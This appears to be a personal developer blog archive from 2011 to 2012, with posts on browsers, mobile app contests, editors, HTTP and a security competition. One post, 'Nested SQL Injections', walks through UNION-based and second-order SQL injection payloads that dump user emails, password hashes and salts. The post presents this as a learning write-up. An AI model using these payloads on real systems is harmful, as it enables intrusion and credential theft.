I am famously known for turning down “writing a letter that could have fetched us lots of funding” for coding instead. (In my defense, there were other people who could have handled it better than me, and we didn’t need it badly at the time)
Almost every group in the campus describes their group as a second home. But in our case it is partially true. We spend almost all our free time in lab. I spent close to 500 hours in the lab in this semester alone. Where does this all this time go? Talking, discussions, development, teaching, lectures among other things.
SDSLabs feels more of a startup than an actual student group to me (and Shashank as well). We have to fight for our funding, manage people, and develop products.
I have done way too much copy-editing to be called “just a developer” anymore. I have spent hundreds of hours fighting Pinta and its numerous bugs.

It has been a great experience working with all these people. I can just hope that the group keeps moving to better innovation, and grander ideas in the future. We are recruiting from first year in upcoming January. If SDSLabs feels like a place you’d enjoy, just come over and take our test. It changed my life, maybe it will change yours too.

Why I'm leaving outlook.com

2012-12-22T00:00:00+00:00

I’d been one of the most eager users of the new outlook.com redesign. I’m a real fan of Metro (sorry, I must call it the New Windows 8 Design), and think that the correct typgraphy mixed with the correct design language should help the users in a great way forward.

Unfortunately, outlook.com is not there yet. The application was made to resemble the Windows Mail app in Windows 8, with 3 tiles per screen. On Windows, the application works in 1/2/3 width modes differently. It changes its navigational strategy to allow you to browse your emails easily. While this could have been easily accomplished using responsive design techniques on the web, outlook does not use it and loses sorely needed funcionality.

The typography of the app is horribly broken, especially in Linux. The font of choice for the app is Calibri, which is missing in Linux, and as such, uses the default system font from the browser. The font sizes are inconsistent, and the application shortcuts are horrible, even though I am using GMail shorcuts option.

The “Insert Link” option is horribly designed. It does not respond to enter keys, and has no place to add “Text” for the link either.

There is no mechanism for quoting messages properly at all. There is no such thing like Conversation View, and I have to waste large amounts of time just to figure out what was added new in the reply to my own mail. As such this becomes largely cumbersome to keep up with.

The archive option from GMail (which keeps my inbox clean) is notably missing as well. (Update: This was added later, with the ability to use archive to move to any custom folder)

The “Active View”, which seems to be a quick preview mode, only works on Windows, because it uses Silverlight. I tried using Moonlight (Silverlight’s OSS clone for Linux), but it seems that Active View uses new Silverlight features. Hence, I can only download pics from Outlook, and not browse them online (which is a huge pain-point for me).

/Rant

Things I expect in a Chrome/iOS update

2012-07-14T00:00:00+00:00

I’ve changed to using Chrome for iOS as my primary browser. Since I only own an iPad 2, all of my observations are with regard to the iPad version of the browser.

Why I love Chrome

Chrome is already my primary browser on my primary machine, and after it came out for the iOS, I tried it out hesitantly, but to my surprise (contrary to what the internet says) it is working out even better than expected.

Ability to sync tabs across my laptop and tablet. I can leave my laptop and continue reading on the go. I don’t own a Mac, so I can’t comment against how Safari/iCloud does it, but it works well enough for me.
All my desktop bookmarks (and bookmarklets) are available and functioning instantly.
Omnibox is awesome, and saves me a lot of trouble, looking in my history, bookmarks, and pre-fetching stuff. This was the most important feature that Chrome v1 brought along with it (when it was released in Windows), and its nice to find it work exactly as indended.
Incognito Mode (I previously used Dolphin in private mode, but this is far better).
Complete bookmark listing while creating a new bookmark. Unlike Desktop version of Chrome, which only shows 5 most recently used folders. I bookmark stuff extensively, and it makes the process much easier for me than on the desktop version, ironically. See Image for Comparision
Tab Switching is brilliant. It seems to be inspired/copied straight from Paper, but it is executed well enough for me. It gets better once you get used to it. The tag bar itself is scrollable as a plus (you can hide/unhide tabs). I’ve read people complaining about this, but it helps me browse on the ipad one-handed.
It feels fast, especially after continous use. I don’t know if its the ported networking stack, or better caching, but page load speeds are better than Safari for me in general.

Note: If you have a jailbroken device, you can setup Chrome as your default browser using BrowserChooser from Cydia. The best part is that home-screen shortcuts open in Chrome as well. I’ve ditched Facebook App for a shortcut icon to touch.facebook.com as a result.

Things I want

Support for configurable search engines. I use them extensively (for eg duckduckgo, google lucky search, amazon, ebay, github, stackoverflow and even google mobile search). The pre-defined search engines are of no use to me (Bing/Yahoo/Guruji).
Find in Page. This is a no-brainer. Edit: This is available via Chrome Customizer in Cydia for a jailbroken device.
Ability to turn off images/javascript) (Content Settings). I’m not sure if it will be possible w/o proxying like how Opera does, but this would be nice to have (since people might want to save bandwidth on 3g).
Support for emailing an entire page (rendered).
UserScript support. I don’t know if apple would allow it at all, but I think the Apple ToS disallows code to be downloaded. What if there were some sort of linking support to allow me to insert some external script tag?
Readability/iReader like support. The safari readability link does work wonders. This could be simulated with a bookmarklet, but once again calling them is hard. Update: ChromeCustomizer can do this via settings menu (see below).
Better access to bookmarks/bookmarklets. At least show me the mobile bookmarks so I can keep them separate.
Wait a bit more before taking the page snapshot for the speed-dial. The GMail snapshot has always been blank for me. At least check if the snapshot is completely blank, and wait a bit more if that is the case.
App shortcuts. The kind like you get for almost all websites on Chrome Webstore. I think they are referred to as “Chrome Apps” against “Extensions”, which would be completely disallowed as per Apple ToS. Since Apps are just shortcuts and some icons, they should be allowed in some manner.
Better history support. Seeing just the last 6 closed tabs kind of sucks. Give me some real history browser (and improve the one in desktop chrome while you’re at it).
Mailto support (for gmail etc). Don’t know if possible, but would be nice to have.
Selection Mailing. Just let me select and mail some html.
Handle pdfs better. By default chrome redirects to Safari for pdfs. After changing Chrome to default, it does handle pdfs fine, but I miss the “Open In iBooks” link. Don’t see this happening though. (Update: This was fixed in a Chrome Update)
Webintents support would be nice to have (via something other than chrome Webstore, I Guess)
CloudPrint support. I don’t use this, but I am assuming there are people who do.
FullScreen support of some sort. Safari in iOS 6 is bringing this much asked for feature, so there are people who would love to have this. Chrome’s faster tab switching should help it out with some of the Full Screen issues. (Edit: This is available via a three finger tap if you install Chromizer from Cydia’s ModMyi repo). Chromizer also forces the iPhone style tab switching on the iPad as a side-effect.

There is also a ChromeURL tweak available for Jailbroken devices that changes the keyboard layout to the the one used for address bar in Safari (So called tld keyboard).

Another one called ChromeCustomizer offers the following:

Add one bookmarklet to the settings menu. I’m using Readable at present.
Adds a broken fullscreen implementation (maybe it is clashing with Chromizer) via the Menu. I prefer Chromizer’s 3 finger tap for fullscreen.
Adds a Find in Page feature. Update: This is now available
Adds some filtering for ads/tracking websites.
Adds an option to change Chrome tab switching mode (iPhone vs iPad).

See this blog post for some more tweaks available on cydia.

Nested SQL Injections

2012-06-09T00:00:00+00:00

I recently did something along this line, and this technique is really cool. (I prefer to call it “inception” injection). Its pretty easy once you figure it out, so here it goes.

If the result of the first query is used as an input in the second query, and the first query is vulnerable, we can use the output as a “input variable” into the second query itself. This would be useful in places where the second query has a better display method than the first one (for instance length restrictions).

Query 1:

SELECT * FROM users WHERE email='$email' AND password = '$pass'

This query is usually accompanied with:

<?php
$_SESSION['email'] = $row['username'];

Query 2:

Assuming something like a profile page:

SELECT * FROM user_details WHERE email='{$_SESSION['email']}'

#Injection

Injecting the first query (basic)

SELECT * FROM users WHERE email='[email protected]' # AND password=''

Everything after # should be treated as a comment. Hence forward, I would not write stuff after # for brevity.

Thinking backwards, we could create a custom query for user_details:

SELECT * FROM user_details WHERE email='' UNION SELECT * FROM user_details #

This would show the details of the first user in the profile page. Let’s think a bit larger:

SELECT * FROM user_details WHERE email='' UNION SELECT GROUP_CONCAT(email), GROUP_CONCAT(password) FROM user_details #

Usually, this won’t work (different number of columns in results). You’d have to use ORDER BY to guess the number of columns. Writing only the UNION part now:

UNION SELECT * FROM user_details ORDER BY 1 #
UNION SELECT * FROM user_details ORDER BY 2 #
UNION SELECT * FROM user_details ORDER BY 3 #
UNION SELECT * FROM user_details ORDER BY 4 # -- Gives Error

So we realize that user_details has 3 columns. Coming back, we could do:

UNION SELECT GROUP_CONCAT(email), GROUP_CONCAT(password), 3 FROM users #

That would give us details upto 1000 characters (GROUP_CONCAT limits). To mitigate those limits:

UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0)

Change the OFFSET and you’re ready to roll.

Inception Injection

This was all a theoritical attack on the second query. Granted you could do lots of stuff from here on the first query, but it is far less responsive (Doesn’t give much output). The only thing you can modify is the email, which offers you a single field.

However, the only attack vector ($_SESSION) for the second query is not directly controlled, but comes instead from the result of the first query. So to perform this attack on the second query, we take the second injection, and use it inside the first one.

SELECT * FROM users WHERE email='' UNION SELECT * FROM users # -- will give us first user
SELECT * FROM users WHERE email='' UNION SELECT * FROM users  ORDER BY 1 # -- keep increasing to get number of columns
SELECT * FROM users WHERE email='' UNION SELECT 1,2,3 FROM users # -- This would let us know which column corresponds to the email id
SELECT * FROM users WHERE email='' UNION SELECT "<inject second query here>",2,3 FROM users # -- This would let us know which column corresponds to the email id

Although we have been writing injection code starting with UNION, it actually would start with ‘ UNION… Using our last injection code for the second query here, it becomes:

SELECT * FROM users WHERE email='' UNION SELECT "' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #",2,3 FROM users #

What happens on the server side:

<?php
	$_SESSION['email'] = "' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #"

and the second query becomes:

SELECT * FROM user_details WHERE email='' UNION SELECT GROUP_CONCAT(email),GROUP_CONCAT(password),GROUP_CONCAT(salt) FROM (SELECT email,password,salt FROM users LIMIT 50 OFFSET 0) #

Note that we still have to keep a # at the end of the inner query. There are portions after # which we still need to discard. Feel free to contact me if you have any further doubts. I am sure this is a well-known and used by people already, but this was something new to me.

Akira - Winning entry to the Adobe Express Apps Contest

2012-05-23T00:00:00+00:00

This is the obligatory blog post that comes along with winning the Adobe Express Apps Contest.

Contest Rules

The contest rules asked you to develop a mobile application, using Adobe Phonegap and related technologies(read Dreamweaver) in a time frame of hardly 18 hours. This duration was assuming that one does no sleep, which I did not.

The problem statement for the application was to create a mobile application for a SUV car manufacturer. The application had to be socially engaging and use the hardware capabilities offered by the device.

Our Interpretation

We started with the problem statement as the complete guide for our application and ought bottom up for an application that would be the least and best amount of work to create an app that fulfils the app requirements.

We started off with a few wireframes, and features thrown around. At the end of the one hour mark, we had our feature list down to :

Owners can share pics of their cars. We wanted the application to be for the owners of the cars, which brings in a lot of additional data. Pic sharing was the most logical thing to do. We were thinking something like an Instagram Community where everybody posts pics about where they have been, their rigs and so on.
A mileage meter. This was a slight gamification of the GPS data that we get. At the start of every journey/trip, you could mark it as such in the app, and we would record your position every 5 minutes. At the end of the trip, you could mark your ending point and see how much you travelled. Also important was the fact that we decided to show a number corresponding to every application user, showing how many miles he/she has travelled so far. Seeing that the next guy has travelled only so and so more miles than you may lead you to travel more.
Maps, obviously. A map for all the previous journeys that you have taken.

Work

We tried to start with JQ.Mobi, which is an alternative to Jquery Mobile, but could not justify it, and switched to JQuery Mobile as it offered better integration with Dreamweaver.

The basic application layout was done using a mix of JQuery Mobile and some custom css. I came across a very good service called Build Phonegap, that allows you to compile your Phonegap application online to different platforms. We started with basing our application on the Phonegap Starter App on GitHub which was quite good. The examples directory in the phonegap download is what we ended up using, though.

Edit: After working a lot more in mobile development, I have come to see a lot more frameworks, and find JQTouch to be quite the minimalist do-one-thing-well plugin.

The most difficult part was to get the application to compile for iOS, without paying the Apple Developer Licence. Since, I could not see myself selling iOS apps anytime soon in the Apple App Store, I was stuck with a jailbroken iPad + iPod Touch, and had to figure out out to compile.

The steps, which took me a lot of time to find on the internet, include :

Download and install the XCode and the Adobe Phonegap toolkit. I downloaded the latest version, 4.2 for xcode, which makes the process a bit easier.
Follow the instructions on this youtube video to allow xcode to compile your application without Code Signing.
Create a corvora application in xcode and follow these instructions to add the www folder to the application.
Compile. If you have an iDevice connected, you should be able to compile and install your application in a single step.

You may need to change your application configuration to “Do not code sign” for this to work.

Getting all the above steps to work for the first time, on a borrowed MacBook Pro was a lot of work, for a mac noob like me. But at the end, getting to see the application getting launched on multiple devices and looking equally good was worth it.

The rest of the time was spent on getting the application features to work, while fighting off sleep. The end result was a still-incomplete application , which ran on multiple devices.

Blackberry

Unfortunately, we were not able to run the app on the only Blackberry Phone that we had as Phonegap only supports Blackberry 5 as of now, while our phone had been upgraded to 6.

Our winning strategy from the start had been to dazzle the judges with an application running across multiple devices, and working equally good. We were pretty sure that none of the other contestants would put in so much effort to get it to run on non-android devices.

Backend

I wrote the application backend in PHP limonade, a framework that i am quite used to. The concept was to give out a rest api to the application to use to Authenticate users and carry out backend tasks.

Code

The code is obviously messy, as a result of being hacked in on a single 18 hour marathon. You may be able to get a few good ideas from the implementations, though. The entire code is available at my akira and akira-backend repositories.

Thoughts on Phonegap

My second slide in the presentation I did for the contest(made on Keynote on the Ipad, while walking to the contest room) says proudly “Phonegap is awesome”. And i seriously mean that. I’ve got started in the world of mobile development, while not having to worry about cross browser compatibility issues, and the like. I can do stuff easily using the already existing technologies that I know and love. There are a ton of excellent Phonegap plugins out there, and many more being written right now.

I am really impressed with what a web developer could do with Phonegap, and its ease of use. The Adobe Developers promised me that the integration would be far better in Dreamweaver 6, which I might just try. Although, it was far easier for me to compile and install the application on an android phone, so I hardly used the emulator which I took the pains to install.

Expectations

What I’d really love, though is a Phonegap simulator. Instead of having to install an android emulator, what if Dreamweaver comes with a Phonegap simulator. Since Phonegap is all javascript, it should be trivial to create basic UIs that look and feel like the native interface of the OS chosen. I would still have to do final tests on the emulator, which i believe are worthless, compared to running it on actual devices. My point is, installing the android emulator and getting the app to run in a emulator is really no big deal, but turns out be a huge time consuming step. For interested web developers, this could be skipped pretty easily, if only Phonegap had its own simulator.

This is all just theory, as you’d have to install the complete Android and ios sdk to compile it for your device, anyway. But it would be a welcome step.

Presentation

The presentation was made as a string of screenshots developing the application, so its not really much help. But here it is anyway. View Original.

Prize

I won a PS3. Yay!

If you have any problems with the code, or the process, feel free to reach out.

Sympathy: My vision of a code editor

2012-05-20T00:00:00+00:00

Update: I have worked on an editor protype along the lines of this blog post. The result is called Sympathy Editor. Please check it out.

I’ve used more than a dozen of editors for mainly two purposes: coding, and writing text. The most liked and used among them would be [Notepad++][http://notepadplusplus.org/] and [Geany][http://geany.org/]. I’m also a vim user, and primarily a web developer. I’ve always liked simple tools that do one thing well, as per the unix philosophy.

The era of WYSIWYG editors in web development is long past. I’m yet to hear someone suggest Dreamweaver as a serious editor. If you were to go out in the Rails world, you’d mostly be met by vim/emacs/textmate fans. As a linux user, I use geany for most of my editing work, including blog posts, like this one (Markdown is hands down, the best thing to happen to word-processing).

Browser meet Editor meet Terminal

There were a few attempts at creating code editors (I don’t like the term IDE) powered by the gecko engine some time back. None of them materialized to anything special. Today, a normal workflow for me involves 3 open applications - a browser (chromium), a terminal window, and a text-editor.

And I’d alt-tab all the way to hell on them.

At this stage, almost everyone will tell me, there is no problem with this workflow. This is exactly how it is supposed to work. But we are not in the 1990s when browsers were just another application. At any given time, I usually have multiple stackoverflow tabs open in the browser pertaining to the code I am writing.

On the other hand we have a terminal, which I usually use to run builds, compile, and do version control stuff. No amount of integrated IDE magic will make me move away from the beloved command line (as it should be).

The easiest solution is to get a second monitor. And yes, I love using dual monitors. But I’m still not satisfied. I want something more. I have 3 core applications, but using 3 monitors is an extremely costly venture. So I’m stuck to running a text editor, and alt tabbing my way between Chromium and Gnome Terminal.

Cloud IDEs

One of the solutions that keeps popping up are the almighty cloud based IDEs (like c9.io), which I really like. But the experience is sub-par at best.

Another cool project called sky-edit involves an extension in mozilla, which enables one to edit any text file in the browser itself, by pointing it to “edit:” urls. This is closer to what my ultimate aim is: “text editor in a browser, editing local files”.

Workflow

What I’d want my workflow to be is point my browser to a text file, edit it in place, change the tab to the live site, and then refresh. Once I realize I have to restart apache, I’d just change my tab to the terminal one, and do my cli stuff there itself.

Shortcuts:

Ctrl+T: New browser tab
Ctrl+E: New editor tab
Ctrl+Y: New Terminal tab
Ctrl+S: Save a file

All file:// urls are browsable as usual, and all text files become editable. Just think of all the possibilities. As long as it uses plain old javascript/css, it could re-use most of the editing part from the excellent ace project. Even codemirror would work brilliantly.

And the best part is that it is still a complete browser. Meaning you get to use all your bookmarks, bookmarklets, plugins, and fancy stuff that you expect in a browser.

Integration

Just think of the possibilities! Since this is just another browser, you can build extensions that target edit windows. Meaning an extension could add support for auto-completion very easily. And repeat for inline documentation browsing.

A build shortcut could probably be used to switch to a running version of the website in some way. What about other stuff? Like spell-checking? Browsers support that. Even dictation would probably work.

And markdown editing! Hell yeah!. Edit it all in your browser itself, while keeping github open in another tab.

Start

This is a simple propsal of sorts, to get a few recommendations about how this should proceed. I asked a similar question on the askubuntu forums, which made me realize what the real problems were. I’m trying to build chromium and get something off the ground. The project is tentatively titled sympathy and has zero code as of now.

I tried to earlier write something similar in python, but realized that I could not build an awesome feature complete text-editor by myself. Which made me shift to forking something like geany. I then realized that getting the webview in geany to be feature-complete as a browser would be again heavily demanding.

The easiest path out is to build the editor in the browser. Why? Because there has already been a lot of work done in this direction, including ace, bespin, codemirror and lots of other editors. Embedding the terminal is another problem, which will be harder to solve in the browser, but I’m willing to give it a try.

As such, my plan is to fork chromium, and work on adding support for text-file editing in the browser. There are a few questions I’d like to answer over time, such as should the browser be stripped? Chromium is a heavy project, and includes some complex features baked right in, which are definately not needed in a text-editor. For instance “Cloud Print”, “Chrome Sync” etc. But at the same time, there is a reason to keep it in as well. I’d like to use this as my primary browser, using all the extensions, bookmarks, and sync features it offers me.

Sounds interesting? I’ve got no idea on how to approach this. Help me out. If you do not like facebook comments, please discuss this on Hacker News, or feel free to drop me a mail.

Update

I did try my best on developing such a thing, and the end result (still far from finished) is Sympathy Editor. Try out the beta. Hopefully you will like it.

New Design of CaptNemo.in

2012-03-31T00:00:00+00:00

I did a redesign of the blog. The main goals for the redesign were to reach a clean, readable layout, which I feel I’ve accomplished.

Old Design

Everything was plain old bootstrap, except for the hover effect on the photograph. I’ve also removed the old “Related Posts” feature, which I felt was not at all useful. In the old homepage, the list of articles was earlier presented as a list (<li>), while it is now slightly better. The topbar has also been removed, instead focussing on a far better sidebar.

New Stuff

I wanted a clean design more than anything. So instead of the sharebox being persistent on every device, I decided to hide it on lower resolutions. It currently hides if the screen width < 1100px, so unless you are on a widescreen resolution monitor and using your browser on fullscreen, you won’t see it.

Responsive design via bootstrap allows you to easily support mobile devices. The left sidebar is stacked, so that even mobile devices have no problem with the layout.

I’d describe the design as clean, minimal.

Bootstrap

The earlier design was using Bootstrap 1.3, and I’ve upgraded to 2.0.2 now. I’ve used the new version before, but with zero changes using bootswatch in a few other places. But this time, I decided to tweak bootstrap for my needs.

I did away with the navigation bar, and changed the default fonts. The site does not feel like a stock bootstrap site any longer. The major contribution from bootstrap, was in fact the grid system, and the responsiveness, which really helped me get it done quickly.

Typography

The fonts used are Ubuntu for the content, and Gentium Book Basic for the headings. I’m using Google Web Fonts Directory for the fonts.

I’m only loading the italicized version of Gentium as I’ve chosen to display all headings (h1-h6) as italics.

What can we learn from Hollywood

2012-03-22T00:00:00+00:00

There is Lot of buzz in the startup industry regarding the killing of Hollywood. However, before we do that (Amen), there is something that I wish to learn from it.

Hollywood ships.

No matter how much we shout at their broken distribution model, there is one thing that I deeply admire about hollywood. It gets shit done. On time. Again and again.

Why is this important? Because it is One of the largest industries I see around that stick to deadlines on a regular basis. This is something deeply missing in the tech world.

When the trailers of a movie tell me that it will be out in summers, I know I can keep a block reserved for when it will come out. Quite unlike Microsoft, which may push back its release dates as often as it wants.

But I thought the Tech industry was done with this deadline bullshit?

Yes, I too despise deadlines and can’t wait for them to get away, but this article is about something else. This is much more about the undying spirit of Hollywood to release stuff.

So each time you are facing feature creep, and it looks like it will never ship, just look at Hollywood and get it done.

Planet IITR Update

2012-03-13T00:00:00+00:00

So, I was just going through my old blog posts, and saw the Planet IITR Update, which I created out of a need for people to be able to find blogs from other people in IITR.

Since no one has ever submitted a single link to the planet , I just thought, why shouldn’t I just crawl all my Facebook friends from IIT-R, and check their website URLs. The Facebook part took ~20 minutes (getting list of users from my 2 friendlists, followed by getting the website url for each of those friends). After that came the link checking part, which tool ~15-20 minutes as well. A list of all the websites (very few people fill up that that field on fb) I found during the search is here (just 39).

After updating the planet, I had to update the spreadsheet as well. And here’s a list of the blogs, just in case.

In case someone is interested in taking over maintenance (meaning link curation) for Planet, please contact me at [email protected]">[email protected], and I’ll be glad to share the authentication details with you.

Link to Planet : Planet IIT-R

In case you were wondering what this planet stuff is all about, it allows one to add a single curated feed to one’s feed reader and get all updates via that. So planet iitr is a curated collection of blogs pertaining to IIT-R.

Why you should learn HTTP?

2012-03-05T00:00:00+00:00

I see people learning RoR, PHP, Django, with a single intent: getting their own website. Of course, it is the million dollar idea that will blow everyone away, as always. But what I find fascinating is that too many upcoming web developers are testing the waters with opinionated coding frameworks. The entry barrier for software development has been lowered exponentially in the last decade, leading to a slew of web frameworks, tutorials, and screencasts. Today is arguably the best time to be involved in software development. Lots of people are learning to code their first web-site with rails, or django. There are lots of benifits with this approach: as a beginner, you are kept isolate from all the complexities, and can focus more easily on your application.

But, it also leads to shallow learning. You could have written a dozen sinatra apps, and still not understand how it all works. And as it stands, it is not essential to learn it. You can easily develop entire websites thinking only in terms of urls, hyperlinks, routes and controllers. This is all good for starting up, when you don’t wanna deal with the complexity of it all, but I’d expect any competent web-developer to understand HTTP.

You see, HTTP is the foundation for all of web. It is how the internet tubes work. Learning HTTP is uncovering the hidden layer behind your browser. It is understanding how cookies, and sessions work in PHP; how xsrf attacks happen and mitigating against them; the magic that rails does when it creates objects from the submitted form parameters transparently for you. And the best part is that its not all that difficult to learn at all.

There was a lot of debate concerning REST recently. I don’t claim to understand REST fully. I’m yet to meet someone who does. But I can comfortably build RESTish APIs, and consume them with ease without breaking a sweat. And smile at the fact that its all just HTTP. You cannot move to REST, HATEOAS unless you are comfortable with HTTP.

So, if you are a beginner in web-development, here’s my advice to you: Understand HTTP. A few pointers:

Read a good book on HTTP.
Read the HTTP RFC.
Wikibooks and Wikipedia entries on HTTP are quite good.
Use the network tab in Webkit Inspector/Firebug. And understand each of the damn headers.
Start using curl -i, if you don’t already
Above all, be curious

Question the web.

Shift to bundler 1.1 (Ruby)

2012-02-23T00:00:00+00:00

In case someone out there is still stuck with bundler 1.0, and hates seeing the Fetching source index for http://rubygems.org/. screen, please update to bundler 1.1.

The following command should do the trick:

gem install bundler --pre

Bundler 1.1 is faster by a huge margin in comparision to 1.0.

References

Making post requests with 'request' module in node.js

2012-02-22T00:00:00+00:00

Was stuck at this for quite some time:

var postData={
	a:1,
	b:2
};
require('request').post({
	uri:"http://example.com/test",
	headers:{'content-type': 'application/x-www-form-urlencoded'},
	body:require('querystring').stringify(postData)
	},function(err,res,body){
		console.log(body);
		console.log(res.statusCode);
});

This will make a post request to http://example.com/test with the querystring parameters in postData. Meaning if you are using PHP, you can see the variables in $_POST instead of parsing request body.

References:

The only way I can work any longer

2012-02-18T00:00:00+00:00

Being a good programmer is 3% talent and 97% not getting distracted by the Internet.

Firstly, a frank admission.

I procastinate.
A lot.
Seriously.

For every second I spend in front of my computer, trying to get some work done, there is a continous struggle going on between my “work” and “play” side of things. Unfortunately, the “play” side seems to be winning. A lot. So I decided to wage a war against it.

Here is my arsenal of tools:

get-shit-done - Script blocks all access to various sites(FB,reddit etc)
Chrome Profiles - One of my profiles is called “get-shit-done”. It features my development extensions, apps, bookmarks, and nothing else. It is plain vanilla Chromium with no puffy unicorns luring me to check my Facebook Notifications.
Music - I find Youtube a surprising good source of music discovery. I listen to almost everything. Recently, I’ve started to listen to Ludovico Einaudi. You may also like http://musicforprogramming.net/ in this regard.
Minimal Tabs - I close a tab as soon as I’m done with it. This leads to ~3-5 tabs in my “get-shit-done” setup. A lesser number of tabs usually means a limit on the number of distracting links. Even Stackoverflow doesn’t help in this regard.
The get-shit-done profile even has settings to clear cache at closings. This leads to me being signed out of everything. Including GMail, Facebook, SO, and everything else. In this mode, I login to something, if it is essential to the work at hand.
Read It Later - I’ve setup all Hacker News feeds above 20 points to be saved automatically to my Read It Later account, which I can easily consume on my iPad at my leisure. However, I find myself itching to browse hckrnews every 5 minutes.

If you find yourself browsing facebook, reddit, youtube, hacker news, or reading blog posts on productivity, I urge you strongly to try this out. Defeating procastination is not easy. And its never a win-or-lose battle. What are your thoughts? How do you stop yourself from getting lost on the internetz? Tell me in comments.

Things I love about Github

2012-02-02T00:00:00+00:00

A slide from GitHub’s famous “How Github uses Github to build Github talk”:

In their recent version of the talk at RubyConf 2011, they changed the slide slightly:

It now reads, “No Pings” instead of “No Managers”.

Not nitpicking, just paying attention.

If you haven’t seen the talk (or just saw the slideshow), you should go and watch the talk (31 mins) Right Now

Choose Between Facebook Groups and Pages

2012-01-26T00:00:00+00:00

I don’t know how many times I’ve said this, but the best way of creating a multi-user discussion platform is to create a facebook page. A little guidelines on what you should use:

Create a group when you really need it (for <100 people) and when you want to have close knit discussions. (People get notifications for each post on the group) -> Leads to spamming
Never create a fake profile for an organization/event/celebrity/anything that is not you. Creating fake profiles is actually against Facebook’s TOS, and can lead to account discontinuation. Plus the barrier of friending a person (instead of “liking it) is higher enough to lead to lesser number of followers.
Create a Facebook Page for every other case. If you are a brand/news/startup/organization (public facing). This is usually the best choice, and it gives you the best outreach of all. (Especially if you want to reach out to People).

In short, just create a Page, unless you know what you are doing.

Google, Fix your Google+ API

2011-12-06T00:00:00+00:00

Dear Google,

Please release the Google+ write API as well. In case you’ve forgotten, its been 6 months since you launched. I’ve got stuff I wanna post, stuff I wanna develop. Please keep to your promises, and don’t make me quote Steve Yegge.

Also, while you are at it, please fix this issue and make the list of +1d url’s available.

Thanks, A frustrated developer and Google+ user.

Someone jailbreak my iPad

2011-12-05T00:00:00+00:00

This is a rant, mainly targeted at Apple. If you are a Apple fanboi, just go elsewhere

Please, and quickly. I can’t take another minute of this iTunes. It refuses to properly sync songs, does not update my songs tag info, unless I play them individually, and to top it all, my iPad gives out incorrect usage information about my apps. I tried adding them up, and it seems the total is way off. And since everything in thr Apple land lives happily inside the propertiery Apple File System, I cannot even check it realiabily. And don’t even get me started on the the application transfers. The file sharing system is so bad in iOS that almost evey other app comes built in with a wi-fi or ftp server. When alomst mevery app that deals with files starts ro do that, there is something definately wrong with your file system approach.

And why doesn’t my itunes recognize any video files at all. I was given a warning about needing QuickTime, and I installed it, but it still refuses to play them in iTunes, and doesn’t even give me an error string to hold on to.

Seriously, iTunes go back to the bloatware land that you came from. I’ll try my luck with something else from now on. And only if someone could give me the specs for the arcane plist format, I might write a PC version of the iBooks app. And calibre needs to fix up its pdf to epub approach. Inline styles are not used anymore, doesn’t it know already.

A few days later…

After spending a few more days with my iPad, I have developed a love/hate relationship wit it. I hate the ugly sync process, which still refuses to sync videos, telling me I have to delete everything to start sync. I love it for its ease of use, awesome touch, and aesthetics. I hate it for its lack of support, oepn sync protocols, and most of all Apple’s close mindedness regarding unsigned binaries.

Seriously Apple, if tablets are the computer of the future, treat them as auch. Let me treat it as a fully functional comouter, which lets me run whatever I want, with whatever privileges I want.

If Microsoft had tried to create such a walled garden of apps in Windows, would it have been so successful? Granted, people would love running apps from Windows 8 Marketplace, if only because it would keep their software updated. But Windows at least has a choice,to allow me to download a tiny binary from a small Windows Developer who does not want to pay MS just to let people use his/her apps.

An appstore is an excellent idea, executed brilliantly by Apple, but please follow MS and give us an official way to do whatever the hell I want to do with my iPad.

A few weeks later…

I really hate my iPad now, especially once I realise that my cheap Nokia cell phone has tether support, while my iPad does not. To do any task that may require you access to a normal file system, such as cloning a repository from github, or editing an document anywhere is impossible in the device. I love playing games on it, though, but it seems like a really costly device to play games and read books on. Get the Fire at less than half the price, and root it to install cyanogen mod (which will soon be available for the Fire).

Sometimes, I wonder if Indian carriers would have installed Carrier IQ on an iPad (which comes without a SIM card). I’ll find out as soon as I can root it.

One of my friends gave a very serious comment on the iPad : “It seems as if you have rented the device from Apple, rather than bought it”. And I’ve come to realise that its a reflection of the sad state that the electronics manufacturing industry is in today.

A few more weeks later :

I jailbroke my iPad :)

Further links :

My Experience with the Deloitte Cyber Collegiate Threat Competition (2011)

2011-11-20T00:00:00+00:00

I recently was part of a team at IIT-Roorkee that won the Deloitte Cyber Collegiate Threat Competition. It was a competition modeled after The Deloitte sponsored CCDC in the US. The event will be organized in the subsequent years as well, and hence this blog post will summarize my experience so as to help any future participants. Moreover, the organizing team has guaranteed us that the competition will be altered significantly in the coming years. This was the first year that this event was organized, after all.

I’ll go into the contest round by round, so beginning with Round 1.

Round 1

Deloitte came to our campus, with little promotion about the event. A presentation was given on the current scenario of Cyber Threat, particularly with respect to India. Free swag was awarded to people who asked some good questions, or answered some as well. After the presentation, a quiz was goven out, consisting mainly of questions about Web Application Security. A few of the questions asked to write down code to circumvent a particular issue (like SQL Injection). But it was mostly about stuff that every security conscious Web Developer would know about.

After the quiz, they selected the top 9 candidates, and asked us to form teams. Make sure that you attend the quiz with your friends, as we definitely had an edge by knowing everyone in our team before the event. The number of teams varied from campus to campus. But if you perform decent enough, you will be selected.

Round 2

Each of the teams were given a VM Image, and we were asked to hack into it. We were not allowed to exploit vulnerabilities in the guest OS, or things like VMWare, or try to boot into the image with another OS, but other than that everything went.

The VM had a library application, with several vulnerabilities. A challenge sheet was mailed to us, and we were expected to finish as many challenges as we could. Any further vulnerabilities not mentioned in the challenge could also be mentioned, but theywere only to be used in the case of a tie with another team.

The time duration for Round 2 was 15 days and we were supposed to submit our reports by then. We were able to complete most of the challenges after we found a blind sql injection vulnerablity. Further, we were able to get a copy of the obsfucated PHP code, which we converted to simpler versions easily enough. We had no way to make use of the code, but it did help us in identifying possible files and entry routes for vulnerabilities.

To get a good score in round 2, try to attack every point in the application. In our case, some of them were too stupid to be used in a real case scenario. For instance, we had password hashes appearing in images. Pour through the javascript code, and search like hell. Stuff like w3af might help you, but since its a limited application only, it is often easier to just track the application flow. We did try kernel level exploites, but the VM was fully patched and up to date.

Round 3

